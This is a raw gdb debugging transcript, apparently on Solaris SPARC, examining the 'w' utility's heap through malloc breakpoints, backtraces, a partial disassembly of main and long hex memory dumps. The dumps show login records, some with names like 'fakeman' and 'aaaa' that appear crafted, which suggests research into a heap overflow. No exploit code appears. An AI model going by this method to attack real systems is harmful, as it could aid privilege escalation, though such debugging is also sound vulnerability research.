0x35040:        0x00000000      0x00000000      0x00000000      0x00000000
0x35050:        0x00000000      0x00000000      0x00000000      0x00000000
0x35060:        0x00000000      0x00000000      0x00000000      0x00000000
0x35070:        0x00000000      0x00000000      0x00000000      0x00000000
0x35080:        0x00000000      0x00000000      0x00000000      0x00000000
0x35090:        0x00000000      0x00000000      0x00000000      0x00000000
0x350a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x350b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x350c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x350d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x350e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x350f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35100:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x35110:        0x00000000      0x00000000      0x00000000      0x00000000
0x35120:        0x00000000      0x00000000      0x00000000      0x00000000
0x35130:        0x00000000      0x00000000      0x00000000      0x00000000
0x35140:        0x00000000      0x00000000      0x00000000      0x00000000
0x35150:        0x00000000      0x00000000      0x00000000      0x00000000
0x35160:        0x00000000      0x00000000      0x00000000      0x00000000
0x35170:        0x00000000      0x00000000      0x00000000      0x00000000
0x35180:        0x00000000      0x00000000      0x00000000      0x00000000
0x35190:        0x00000000      0x00000000      0x00000000      0x00000000
0x351a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x351b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x351c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x351d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x351e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x351f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35200:        0x00000000      0x00000000      0x00000000      0x00000000
0x35210:        0x00000000      0x00000000      0x00000000      0x00000000
0x35220:        0x00000000      0x00000000      0x00000000      0x00000000
0x35230:        0x00000000      0x00000000      0x00000000      0x00000000
0x35240:        0x00000000      0x00000000      0x00000000      0x00000000
0x35250:        0x00000000      0x00000000      0x00000000      0x00000000
0x35260:        0x00000000      0x00000000      0x00000000      0x00000000
0x35270:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x35280:        0x00000000      0x00000000      0x00000000      0x00000000
0x35290:        0x00000000      0x00000000      0x00000000      0x00000000
0x352a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x352b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x352c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x352d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x352e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x352f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35300:        0x00000000      0x00000000      0x00000000      0x00000000
0x35310:        0x00000000      0x00000000      0x00000000      0x00000000
0x35320:        0x00000000      0x00000000      0x00000000      0x00000000
0x35330:        0x00000000      0x00000000      0x00000000      0x00000000
0x35340:        0x00000000      0x00000000      0x00000000      0x00000000
0x35350:        0x00000000      0x00000000      0x00000000      0x00000000
0x35360:        0x00000000      0x00000000      0x00000000      0x00000000
0x35370:        0x00000000      0x00000000      0x00000000      0x00000000
0x35380:        0x00000000      0x00000000      0x00000000      0x00000000
0x35390:        0x00000000      0x00000000      0x00000000      0x00000000
0x353a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x353b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x353c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x353d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x353e0:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x353f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35400:        0x00000000      0x00000000      0x00000000      0x00000000
0x35410:        0x00000000      0x00000000      0x00000000      0x00000000
0x35420:        0x00000000      0x00000000      0x00000000      0x00000000
0x35430:        0x00000000      0x00000000      0x00000000      0x00000000
0x35440:        0x00000000      0x00000000      0x00000000      0x00000000
0x35450:        0x00000000      0x00000000      0x00000000      0x00000000
0x35460:        0x00000000      0x00000000      0x00000000      0x00000000
0x35470:        0x00000000      0x00000000      0x00000000      0x00000000
0x35480:        0x00000000      0x00000000      0x00000000      0x00000000
0x35490:        0x00000000      0x00000000      0x00000000      0x00000000
0x354a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x354b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x354c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x354d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x354e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x354f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35500:        0x00000000      0x00000000      0x00000000      0x00000000
0x35510:        0x00000000      0x00000000      0x00000000      0x00000000
0x35520:        0x00000000      0x00000000      0x00000000      0x00000000
0x35530:        0x00000000      0x00000000      0x00000000      0x00000000
0x35540:        0x00000000      0x00000000      0x00000000      0x00000000
0x35550:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x35560:        0x00000000      0x00000000      0x00000000      0x00000000
0x35570:        0x00000000      0x00000000      0x00000000      0x00000000
0x35580:        0x00000000      0x00000000      0x00000000      0x00000000
0x35590:        0x00000000      0x00000000      0x00000000      0x00000000
0x355a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x355b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x355c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x355d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x355e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x355f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35600:        0x00000000      0x00000000      0x00000000      0x00000000
0x35610:        0x00000000      0x00000000      0x00000000      0x00000000
0x35620:        0x00000000      0x00000000      0x00000000      0x00000000
0x35630:        0x00000000      0x00000000      0x00000000      0x00000000
0x35640:        0x00000000      0x00000000      0x00000000      0x00000000
0x35650:        0x00000000      0x00000000      0x00000000      0x00000000
0x35660:        0x00000000      0x00000000      0x00000000      0x00000000
0x35670:        0x00000000      0x00000000      0x00000000      0x00000000
0x35680:        0x00000000      0x00000000      0x00000000      0x00000000
0x35690:        0x00000000      0x00000000      0x00000000      0x00000000
0x356a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x356b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x356c0:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x356d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x356e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x356f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35700:        0x00000000      0x00000000      0x00000000      0x00000000
0x35710:        0x00000000      0x00000000      0x00000000      0x00000000
0x35720:        0x00000000      0x00000000      0x00000000      0x00000000
0x35730:        0x00000000      0x00000000      0x00000000      0x00000000
0x35740:        0x00000000      0x00000000      0x00000000      0x00000000
0x35750:        0x00000000      0x00000000      0x00000000      0x00000000
0x35760:        0x00000000      0x00000000      0x00000000      0x00000000
0x35770:        0x00000000      0x00000000      0x00000000      0x00000000
0x35780:        0x00000000      0x00000000      0x00000000      0x00000000
0x35790:        0x00000000      0x00000000      0x00000000      0x00000000
0x357a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x357b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x357c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x357d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x357e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x357f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35800:        0x00000000      0x00000000      0x00000000      0x00000000
0x35810:        0x00000000      0x00000000      0x00000000      0x00000000
0x35820:        0x00000000      0x00000000      0x00000000      0x00000000
0x35830:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x35840:        0x00000000      0x00000000      0x00000000      0x00000000
0x35850:        0x00000000      0x00000000      0x00000000      0x00000000
0x35860:        0x00000000      0x00000000      0x00000000      0x00000000
0x35870:        0x00000000      0x00000000      0x00000000      0x00000000
0x35880:        0x00000000      0x00000000      0x00000000      0x00000000
0x35890:        0x00000000      0x00000000      0x00000000      0x00000000
0x358a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x358b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x358c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x358d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x358e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x358f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35900:        0x00000000      0x00000000      0x00000000      0x00000000
0x35910:        0x00000000      0x00000000      0x00000000      0x00000000
0x35920:        0x00000000      0x00000000      0x00000000      0x00000000
0x35930:        0x00000000      0x00000000      0x00000000      0x00000000
0x35940:        0x00000000      0x00000000      0x00035030      0x00000000
0x35950:        0x00000003      0x00000000      0x00000000      0x00000000
0x35960:        0x00000000      0x00000000      0x00000000      0x00000000
0x35970:        0x00000000      0x00000000      0x00000000      0x00000000
0x35980:        0x00000000      0x00000000      0x00000000      0x00000000
0x35990:        0x00000000      0x00000000      0x00000000      0x00000000
0x359a0:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x359b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x359c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x359d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x359e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x359f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35a00:        0x00000000      0x00000000      0x00000000      0x00000000
0x35a10:        0x00000000      0x00000000      0x00000000      0x00000000
0x35a20:        0x00000000      0x00000000      0x00000000      0x00000000
0x35a30:        0x00000000      0x00000000      0x00000000      0x00000000
0x35a40:        0x00000000      0x00000000      0x00000000      0x00000000
0x35a50:        0x00000000      0x00000000      0x00000000      0x00000000
0x35a60:        0x00000000      0x00000000      0x00000000      0x00000000
0x35a70:        0x00000000      0x00000000      0x00000000      0x00000000
0x35a80:        0x00000000      0x00000000      0x00000000      0x00000000
0x35a90:        0x00000000      0x00000000      0x00000000      0x00000000
0x35aa0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35ab0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35ac0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35ad0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35ae0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35af0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35b00:        0x00000000      0x00000000      0x00000000      0x00000000
0x35b10:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x35b20:        0x00000000      0x00000000      0x00000000      0x00000000
0x35b30:        0x00000000      0x00000000      0x00000000      0x00000000
0x35b40:        0x00000000      0x00000000      0x00000000      0x00000000
0x35b50:        0x00000000      0x00000000      0x00000000      0x00000000
0x35b60:        0x00000000      0x00000000      0x00000000      0x00000000
0x35b70:        0x00000000      0x00000000      0x00000000      0x00000000
0x35b80:        0x00000000      0x00000000      0x00000000      0x00000000
0x35b90:        0x00000000      0x00000000      0x00000000      0x00000000
0x35ba0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35bb0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35bc0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35bd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35be0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35bf0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35c00:        0x00000000      0x00000000      0x00000000      0x00000000
0x35c10:        0x00000000      0x00000000      0x00000000      0x00000000
0x35c20:        0x00000000      0x00000000      0x00000000      0x00000000
0x35c30:        0x00000000      0x00000000      0x00000000      0x00000000
0x35c40:        0x00000000      0x00000000      0x00000000      0x00000000
0x35c50:        0x00000000      0x00000000      0x00000000      0x00000000
0x35c60:        0x00000000      0x00000000      0x00000000      0x00000000
0x35c70:        0x00000000      0x00000000      0x00000000      0x00000000
0x35c80:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x35c90:        0x00000000      0x00000000      0x00000000      0x00000000
0x35ca0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35cb0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35cc0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35cd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35ce0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35cf0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35d00:        0x00000000      0x00000000      0x00000000      0x00000000
0x35d10:        0x00000000      0x00000000      0x00000000      0x00000000
0x35d20:        0x00000000      0x00000000      0x00000000      0x00000000
0x35d30:        0x00000000      0x00000000      0x00000000      0x00000000
0x35d40:        0x00000000      0x00000000      0x00000000      0x00000000
0x35d50:        0x00000000      0x00000000      0x00000000      0x00000000
0x35d60:        0x00000000      0x00000000      0x00000000      0x00000000
0x35d70:        0x00000000      0x00000000      0x00000000      0x00000000
0x35d80:        0x00000000      0x00000000      0x00000000      0x00000000
0x35d90:        0x00000000      0x00000000      0x00000000      0x00000000
0x35da0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35db0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35dc0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35dd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35de0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35df0:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x35e00:        0x00000000      0x00000000      0x00000000      0x00000000
0x35e10:        0x00000000      0x00000000      0x00000000      0x00000000
0x35e20:        0x00000000      0x00000000      0x00000000      0x00000000
0x35e30:        0x00000000      0x00000000      0x00000000      0x00000000
0x35e40:        0x00000000      0x00000000      0x00000000      0x00000000
0x35e50:        0x00000000      0x00000000      0x00000000      0x00000000
0x35e60:        0x00000000      0x00000000      0x00000000      0x00000000
0x35e70:        0x00000000      0x00000000      0x00000000      0x00000000
0x35e80:        0x00000000      0x00000000      0x00000000      0x00000000
0x35e90:        0x00000000      0x00000000      0x00000000      0x00000000
0x35ea0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35eb0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35ec0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35ed0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35ee0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35ef0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35f00:        0x00000000      0x00000000      0x00000000      0x00000000
0x35f10:        0x00000000      0x00000000      0x00000000      0x00000000
0x35f20:        0x00000000      0x00000000      0x00000000      0x00000000
0x35f30:        0x00000000      0x00000000      0x00000000      0x00000000
0x35f40:        0x00000000      0x00000000      0x00000000      0x00000000
0x35f50:        0x00000000      0x00000000      0x00000000      0x00000000
0x35f60:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x35f70:        0x00000000      0x00000000      0x00000000      0x00000000
0x35f80:        0x00000000      0x00000000      0x00000000      0x00000000
0x35f90:        0x00000000      0x00000000      0x00000000      0x00000000
0x35fa0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35fb0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35fc0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35fd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35fe0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35ff0:        0x00000000      0x00000000      0x00000000      0x00000000
0x36000:        Cannot access memory at address 0x36000
(gdb) b _malloc_unlocked
Breakpoint 2 at 0xff2c1dc8
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) n
Program not restarted.
(gdb) r -h foo
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32 -h foo
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0xff2b624c in calloc () from /usr/lib/libc.so.1
#3  0xff2fabb4 in textdomain () from /usr/lib/libc.so.1
#4  0x00010ee8 in main ()
(gdb) disas main
Dump of assembler code for function main:
0x10ec4 <main>: save  %sp, -1992, %sp
0x10ec8 <main+4>:       sethi  %hi(0x12000), %g2
0x10ecc <main+8>:       mov  %i0, %i3
0x10ed0 <main+12>:      add  %g2, 0x194, %o1
0x10ed4 <main+16>:      call  0x22490 <setlocale>
0x10ed8 <main+20>:      mov  6, %o0
0x10edc <main+24>:      sethi  %hi(0x12000), %g2
0x10ee0 <main+28>:      call  0x2249c <textdomain>
0x10ee4 <main+32>:      add  %g2, 0x198, %o0    ! 0x12198 <_lib_version+8>
0x10ee8 <main+36>:      ld  [ %i1 ], %g2
0x10eec <main+40>:      ldsb  [ %g2 ], %g2
0x10ef0 <main+44>:      cmp  %g2, 0x2d
0x10ef4 <main+48>:      mov  1, %g2
0x10ef8 <main+52>:      be  0x10f04 <main+64>
0x10efc <main+56>:      sethi  %hi(0x22800), %l0
0x10f00 <main+60>:      clr  %g2
0x10f04 <main+64>:      ld  [ %i1 ], %o0
0x10f08 <main+68>:      st  %g2, [ %l0 + 0x1ec ]
0x10f0c <main+72>:      call  0x224a8 <strrchr>
0x10f10 <main+76>:      mov  0x2f, %o1
0x10f14 <main+80>:      ld  [ %l0 + 0x1ec ], %g2
0x10f18 <main+84>:      cmp  %g2, 0
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) p/x $i0
$1 = 0x18
(gdb) r -sh foo
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32 -sh foo
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1d24 in _smalloc () from /usr/lib/libc.so.1
#2  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#3  0xff2b624c in calloc () from /usr/lib/libc.so.1
#4  0xff2fabb4 in textdomain () from /usr/lib/libc.so.1
#5  0x00010ee8 in main ()
(gdb) c
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0xff2fc22c in _textdomain_u () from /usr/lib/libc.so.1
#3  0xff2fabec in textdomain () from /usr/lib/libc.so.1
#4  0x00010ee8 in main ()
(gdb) c
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1d24 in _smalloc () from /usr/lib/libc.so.1
#2  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#3  0xff2fc22c in _textdomain_u () from /usr/lib/libc.so.1
#4  0xff2fabec in textdomain () from /usr/lib/libc.so.1
#5  0x00010ee8 in main ()
(gdb) c
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0x000110b4 in main ()
(gdb) c
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0xff30f22c in _findbuf () from /usr/lib/libc.so.1
#3  0xff30f0e0 in _filbuf () from /usr/lib/libc.so.1
#4  0xff312cf8 in fread () from /usr/lib/libc.so.1
#5  0xff2bd91c in getutxent_frec () from /usr/lib/libc.so.1
#6  0xff2bd9c4 in getutxent () from /usr/lib/libc.so.1
#7  0x000110dc in main ()
(gdb) c
Continuing.

Breakpoint 1, 0x00011114 in main ()
(gdb) x/96000x 0x33000
0x33000:        0x00000000      0x00000000      0x00000000      0x00000000
0x33010:        0x00000000      0x00000000      0x00000000      0x00000000
0x33020:        0x00002009      0x00000000      0x00000000      0x00000000
0x33030:        0x00000000      0x00000000      0x00000000      0x00000000
0x33040:        0x00000000      0x732f3136      0x7074732f      0x31360000
0x33050:        0x00000000      0x00000000      0x00000000      0x00000000
0x33060:        0x00000000      0x00000000      0x000014fd      0x00080000
0x33070:        0x00000000      0x52526920      0x00082de6      0x00000000
0x33080:        0x00000000      0x00000000      0x00000000      0x00000000
0x33090:        0x00000000      0x00000000      0x00000000      0x00000000
0x330a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x330b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x330c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x330d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x330e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x330f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33100:        0x00000000      0x00000000      0x00000000      0x00000000
0x33110:        0x00000000      0x00000000      0x00000000      0x00000000
0x33120:        0x00000000      0x00000000      0x00000000      0x00000000
0x33130:        0x00000000      0x00000000      0x00000000      0x00000000
0x33140:        0x00000000      0x00000000      0x00000000      0x00000000
0x33150:        0x00000000      0x00000000      0x00000000      0x00000000
0x33160:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x33170:        0x00000000      0x00000000      0x00000000      0x00000000
0x33180:        0x00000000      0x00000000      0x00000000      0x00000000
0x33190:        0x00000000      0x0000002f      0x62617a7a      0x00000000
0x331a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x331b0:        0x00000000      0x00000000      0x72313030      0x7074732f
0x331c0:        0x34000000      0x00000000      0x00000000      0x00000000
0x331d0:        0x00000000      0x00000000      0x00000000      0x000056cb
0x331e0:        0x00080000      0x00000ba1      0x5440c4dc      0x00000000
0x331f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33200:        0x00000000      0x00000000      0x000a6c6f      0x63616c68
0x33210:        0x6f737400      0x00000000      0x00000000      0x00000000
0x33220:        0x00000000      0x00000000      0x00000000      0x00000000
0x33230:        0x00000000      0x00000000      0x00000000      0x00000000
0x33240:        0x00000000      0x00000000      0x00000000      0x00000000
0x33250:        0x00000000      0x00000000      0x00000000      0x00000000
0x33260:        0x00000000      0x00000000      0x00000000      0x00000000
0x33270:        0x00000000      0x00000000      0x00000000      0x00000000
0x33280:        0x00000000      0x00000000      0x00000000      0x00000000
0x33290:        0x00000000      0x00000000      0x00000000      0x00000000
0x332a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x332b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x332c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x332d0:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x332e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x332f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33300:        0x00000000      0x00000000      0x00000000      0x62617a7a
0x33310:        0x00000000      0x00000000      0x00000000      0x00000000
0x33320:        0x00000000      0x00000000      0x00000000      0x2f320000
0x33330:        0x7074732f      0x32000000      0x00000000      0x00000000
0x33340:        0x00000000      0x00000000      0x00000000      0x00000000
0x33350:        0x000003ce      0x00080000      0x000007a8      0x5438d560
0x33360:        0x00000000      0x00000000      0x00000000      0x00000000
0x33370:        0x00000000      0x00000000      0x00000000      0x000b3a70
0x33380:        0x74732f31      0x3a532e30      0x00000000      0x00000000
0x33390:        0x00000000      0x00000000      0x00000000      0x00000000
0x333a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x333b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x333c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x333d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x333e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x333f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33400:        0x00000000      0x00000000      0x00000000      0x00000000
0x33410:        0x00000000      0x00000000      0x00000000      0x00000000
0x33420:        0x00000000      0x00000000      0x00000000      0x00000000
0x33430:        0x00000000      0x00000000      0x00000000      0x00000000
0x33440:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x33450:        0x00000000      0x00000000      0x00000000      0x00000000
0x33460:        0x00000000      0x00000000      0x00000000      0x00000000
0x33470:        0x00000000      0x00000000      0x00000000      0x000000a0
0x33480:        0x62617a7a      0x00000000      0x00000000      0x00000000
0x33490:        0x00000000      0x00000000      0x00000000      0x00000000
0x334a0:        0x2f330000      0x7074732f      0x33000000      0x00000000
0x334b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x334c0:        0x00000000      0x00004027      0x00080000      0x000007a8
0x334d0:        0x543f3195      0x00000000      0x00000000      0x00000000
0x334e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x334f0:        0x000b3a70      0x74732f37      0x3a532e30      0x00000000
0x33500:        0x00000000      0x00000000      0x00000000      0x00000000
0x33510:        0x00000000      0x00000000      0x00000000      0x00000000
0x33520:        0x00000000      0x00000000      0x00000000      0x00000000
0x33530:        0x00000000      0x00000000      0x00000000      0x00000000
0x33540:        0x00000000      0x00000000      0x00000000      0x00000000
0x33550:        0x00000000      0x00000000      0x00000000      0x00000000
0x33560:        0x00000000      0x00000000      0x00000000      0x00000000
0x33570:        0x00000000      0x00000000      0x00000000      0x00000000
0x33580:        0x00000000      0x00000000      0x00000000      0x00000000
0x33590:        0x00000000      0x00000000      0x00000000      0x00000000
0x335a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x335b0:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x335c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x335d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x335e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x335f0:        0x000000a0      0x66616b65      0x6d616e00      0x00000000
0x33600:        0x00000000      0x00000000      0x00000000      0x00000000
0x33610:        0x00000000      0x61616161      0x7074732f      0x2f2f3300
0x33620:        0x00000000      0x00000000      0x00000000      0x00000000
0x33630:        0x00000000      0x00000000      0x00002328      0x0008000a
0x33640:        0x000107a8      0x000186a0      0x00002710      0x00000004
0x33650:        0x00000000      0x00000000      0x00000000      0x00000000
0x33660:        0x00000000      0x00056261      0x7a7a0000      0x00000000
0x33670:        0x00000000      0x00000000      0x00000000      0x00000000
0x33680:        0x00000000      0x00000000      0x00000000      0x00000000
0x33690:        0x00000000      0x00000000      0x00000000      0x00000000
0x336a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x336b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x336c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x336d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x336e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x336f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33700:        0x00000000      0x00000000      0x00000000      0x00000000
0x33710:        0x00000000      0x00000000      0x00000000      0x00000000
0x33720:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x33730:        0x00000000      0x00000000      0x00000000      0x00000000
0x33740:        0x00000000      0x00000000      0x00000000      0x00000000
0x33750:        0x00000000      0x00000000      0x00000000      0x00000000
0x33760:        0x00000000      0x00000050      0x66616b65      0x6d616e00
0x33770:        0x00000000      0x00000000      0x00000000      0x00000000
0x33780:        0x00000000      0x00000000      0x61616162      0x7074732f
0x33790:        0x2f2f3300      0x00000000      0x00000000      0x00000000
0x337a0:        0x00000000      0x00000000      0x00000000      0x00002328
0x337b0:        0x0008000a      0x000107a8      0x000186a0      0x00002710
0x337c0:        0x00000004      0x00000000      0x00000000      0x00000000
0x337d0:        0x00000000      0x00000000      0x00056261      0x7a7a0000
0x337e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x337f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33800:        0x00000000      0x00000000      0x00000000      0x00000000
0x33810:        0x00000000      0x00000000      0x00000000      0x00000000
0x33820:        0x00000000      0x00000000      0x00000000      0x00000000
0x33830:        0x00000000      0x00000000      0x00000000      0x00000000
0x33840:        0x00000000      0x00000000      0x00000000      0x00000000
0x33850:        0x00000000      0x00000000      0x00000000      0x00000000
0x33860:        0x00000000      0x00000000      0x00000000      0x00000000
0x33870:        0x00000000      0x00000000      0x00000000      0x00000000
0x33880:        0x00000000      0x00000000      0x00000000      0x00000000
0x33890:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x338a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x338b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x338c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x338d0:        0x00000000      0x00000000      0x00000050      0x00000000
0x338e0:        0x00000048      0x7a736d6f      0x6e000000      0x00000000
